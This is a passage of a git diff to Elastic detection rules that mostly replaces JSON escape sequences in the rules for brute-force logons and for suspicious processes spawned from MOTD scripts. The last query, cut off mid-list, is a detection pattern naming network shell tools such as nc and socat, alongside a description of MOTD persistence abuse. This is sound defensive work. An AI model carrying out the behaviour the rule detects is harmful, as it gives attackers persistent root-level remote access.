"setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json index bc376237cdc..de34977434b 100644 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json +++ b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_8.json @@ -13,7 +13,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", + "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n", "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", "references": [ "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" @@ -67,7 +67,7 @@ ], "risk_score": 47, "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json index f766789a4cf..a51689d52e9 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_1.json @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json index 377f3aeb3ce..cc536291188 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_2.json @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json index babde9b7245..18f08babc49 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_3.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.executable : (\"*sh\", \"python*\", \"perl\", \"php*\")\n", "references": [ "https://pberba.github.io/security/2022/02/06/linux-threat-hunting-for-persistence-initialization-scripts-and-shell-configuration/#10-boot-or-logon-initialization-scripts-motd" @@ -63,7 +63,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json index 8f94c47ab1d..7342e452fcc 100644 --- a/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json +++ b/packages/security_detection_engine/kibana/security_rule/4ec47004-b34a-42e6-8003-376a123ea447_4.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Spawned from MOTD Detected", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Spawned from MOTD Detected\n\nThe message-of-the-day (MOTD) is used to display a customizable system-wide message or information to users upon login in Linux.\n\nAttackers can abuse message-of-the-day (motd) files to run scripts, commands or malicious software every time a user connects to a system over SSH or a serial connection, by creating a new file within the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directory. Files in these directories will automatically run with root privileges when they are made executable.\n\nThis rule identifies the execution of potentially malicious processes from a MOTD script, which is not likely to occur as default benign behavior. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the file that was created or modified from which the suspicious process was executed.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate whether any other files in the `/etc/update-motd.d/` or `/usr/lib/update-notifier/` directories have been altered.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (path LIKE '/etc/update-motd.d/%' OR path LIKE '/usr/lib/update-notifier/%')\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services, and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### Related Rules\n\n- Potential Persistence Through MOTD File Creation Detected - 96d11d31-9a79-480f-8401-da28b194608f\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Any activity that triggered the alert and is not inherently malicious must be monitored by the security team.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the MOTD files or restore them to the original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "process where host.os.type == \"linux\" and \nevent.type == \"start\" and event.action : (\"exec\", \"exec_event\") and\nprocess.parent.executable : (\"/etc/update-motd.d/*\", \"/usr/lib/update-notifier/*\") and\nprocess.name : (\"bash\", \"dash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\", \"python*\", \"perl\", \"php*\", \"nc\", \"ncat\", \n\"netcat\", \"socat\", 